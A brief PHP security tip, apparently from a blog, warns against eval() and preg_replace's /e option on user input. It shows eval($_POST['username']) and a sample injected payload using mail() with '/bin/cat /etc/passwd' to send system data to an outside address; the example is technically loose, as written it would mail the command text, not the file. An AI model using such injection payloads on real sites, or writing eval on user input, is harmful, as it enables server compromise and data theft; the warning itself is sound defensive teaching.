eval( ) has aliases. Do not use the /e option with preg_replace( ), the preg_replace( ) function with the /e option also calls eval( ) on PHP code, especially if you use any user-entered data in the calls.
So what does eval do? In
eval ( string $code_str ),
eval evaluates the string given in
code_str as PHP code. Imagine you get a form username input field value using
eval($_POST['username']), if the hacker type the following value in the input field:
mail("firstname.lastname@example.org", "Some passwords", '/bin/cat /etc/passwd'). You will be sending your server password to the hacker.
So don’t use eval unless you are suicidal. ;)